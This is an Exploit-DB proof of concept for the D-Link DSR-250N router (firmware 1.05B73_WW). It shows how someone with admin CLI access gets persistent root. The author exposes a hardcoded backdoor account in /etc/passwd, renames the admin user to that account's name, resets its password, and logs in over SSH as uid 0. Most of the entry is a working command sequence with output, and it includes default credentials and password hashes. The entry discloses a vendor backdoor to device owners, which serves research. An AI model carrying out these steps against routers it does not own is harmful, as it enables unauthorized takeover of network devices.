D-Link DSR-250N Persistent Root Access

EDB-ID:

22930

CVE:

N/A

Author:

0_o

Type:

papers

Platform:

Hardware

Published:

2012-11-26

# 
# Router:                D-Link DSR-250N
# Hardware Version:      A1
# Firmware Version:      1.05B73_WW
# 
# Arch:                  armv6l, Linux
# 
# Author:                0_o -- null_null
#                        nu11.nu11 [at] yahoo.com
# Date:                  2012-11-25
# 
# Purpose:               Persistently become real root on your D-Link DSR-250N 
#                        I just wanted to do real firewalling on this 
#                        cigarette box, but the router software wouldn't
#                        let me. So it screamed after getting h@kCz0r3d.
# 
# Prerequisites:         admin access to CLI
#
#
# Here comes the fun stuff... :-)
#
# From the default configuration, you can log in via SSH.
# user: admin, pass: admin
# 

root@bt:~# ssh admin@192.168.10.1
The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.
RSA key fingerprint is aa:66:55:ee:cc:66:ff:aa:dd:44:55:00:44:99:33:77.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.
admin@192.168.10.1's password: 


BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

************************************************
    Welcome to DSR-250N Command Line Interface
************************************************
D-Link DSR> 

.exit     Exit this session
.help     Display an overview of the CLI syntax
.history  Display the current session's command line history
.reboot   Reboot the system.
.top      Return to the default mode
dot11     [Wireless configuration Mode]
license   [License configuration Mode]
net       [Networking configuration mode]
qos       [QoS configuration Mode]
security  [Security configuration mode]
show      Display system components' configuration
system    [System configuration mode]
util      [Utilities Mode]
vpn       [VPN configuration Mode]

D-Link DSR> 

#
# So you get dropped into the CLI. No shellz :(
# Let's see what we can do from here...
#

D-Link DSR> util cat /etc/passwd
root:!:0:0:root:/root:/bin/sh
ZX4q9Q9JUpwTZuo7:$1$CtRn6tvb$c3GrPDua6tg9pXFWu.9rF1:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh

#
# Ohhh, a backdoor user! Shame on you, D-Link!!!
# First, I tried to crack the hash. After 24hrs,
# I dropped that and searched for another way.
# Turns out that there are more nice functions
# available in that CLI...  ;-)
#

D-Link DSR> system users edit 1
users-config[userdb]> username ZX4q9Q9JUpwTZuo7
users-config[userdb]> password newpass
users-config[userdb]> password_confirm newpass
users-config[userdb]> save

#
# Now, you will have overwritten the first user 
# managed by the D-Link router software. This 
# user is your current admin user. We have given him 
# the username of the backdoor user and set a new 
# password. You might want to add another admin 
# user first and modify that.
# For this PoC, I just use default one. Let's see
# what /etc/passwd and /etc/shadow look like now...
#

users-config[userdb]> util cat /etc/passwd
root:!:0:0:root:/root:/bin/sh
ZX4q9Q9JUpwTZuo7:wq8NLLJdoSzSw:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
users-config[userdb]> util cat /etc/shadow
guest:TN08ndVLhlVok:14975:0:99999:7:::

#
# So, the MD5-Crypt hash has been replaced by a 
# DES-Crypt (unix crypt) hash...
#

users-config[userdb]> exit
D-Link DSR> .exit
Connection to 192.168.10.1 closed by remote host.
Connection to 192.168.10.1 closed.

#
# Let's have a taste of the new freedom...
#

root@bt:~# ssh ZX4q9Q9JUpwTZuo7@192.168.10.1
ZX4q9Q9JUpwTZuo7@192.168.10.1's password: 


BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

DSR-250N> id
uid=0(root) gid=0(root) groups=0(root)
DSR-250N> uname -a
Linux DSR-250N 2.6.31.1-cavm1 #5 Fri Sep 28 11:41:26 IST 2012 armv6l GNU/Linux
DSR-250N> ls -la /
drwxr-xr-x   18 root     root             0 Jan  1 00:00 .
drwxr-xr-x   18 root     root             0 Jan  1 00:00 ..
drwxr-xr-x    2 root     root             0 Jan  1 00:02 bin
lrwxrwxrwx    1 root     root             5 Jan  1  1970 data -> flash
drwxr-xr-x    5 root     root             0 Jan  1 00:02 dev
drwxr-xr-x   12 root     root             0 Jan  1 00:08 etc
drwxr-xr-x    4 root     root             0 Jan  1  1970 flash
drwxr-xr-x    2 root     root             0 Jan  1  1970 flash_multiboot
drwxr-xr-x    4 root     root             0 Jan  1 00:01 home
lrwxrwxrwx    1 root     root            10 Sep 28  2012 init -> /sbin/init
drwxr-xr-x    2 root     root             0 Jan  1 00:00 lib
lrwxrwxrwx    1 root     root            12 Sep 28  2012 linuxrc -> /bin/busybox
drwxr-xr-x    3 root     root             0 Jan  1  1970 mnt
drwxr-xr-x    9 root     root           146 Sep 28  2012 pfrm2.0
dr-xr-xr-x   71 root     root             0 Jan  1  1970 proc
drwxr-xr-x    2 root     root             0 Sep 28  2012 root
drwxr-xr-x    2 root     root             0 Jan  1 00:01 sbin
drwxr-xr-x   11 root     root             0 Jan  1  1970 sys
-rw-r--r--    1 root     root             5 Jan  1 00:00 temp
drwxrwxrwt    4 root     root           380 Jan  1 00:09 tmp
drwxr-xr-x    6 root     root             0 Jan  1  1970 usr
drwxrwxrwt   18 root     root          1200 Jan  1 00:03 var
DSR-250N> df -h
Filesystem                Size      Used Available Use% Mounted on
tmpfs                    61.2M    956.0K     60.3M   2% /tmp
tmpfs                    61.2M    932.0K     60.3M   1% /var
tmpfs                    61.2M         0     61.2M   0% /mnt/tmpfs
/dev/mtdblock3           19.5M     19.5M         0 100% /pfrm2.0
/dev/mtdblock4            2.1M    504.0K      1.6M  23% /flash
DSR-250N> echo "r00ted! :-)"
r00ted! :-)
DSR-250N> exit
Connection to 192.168.10.1 closed.
root@bt:~# 

#
# Your web gui will not work until you reboot your box. Then, log 
# in with the backdoor user and you will have the full admin gui back.
#
# By the way, how did they confine us to the CLI in the first place?
#

DSR-250N> cat /etc/profile 
# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "ZX4q9Q9JUpwTZuo7" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '
DSR-250N>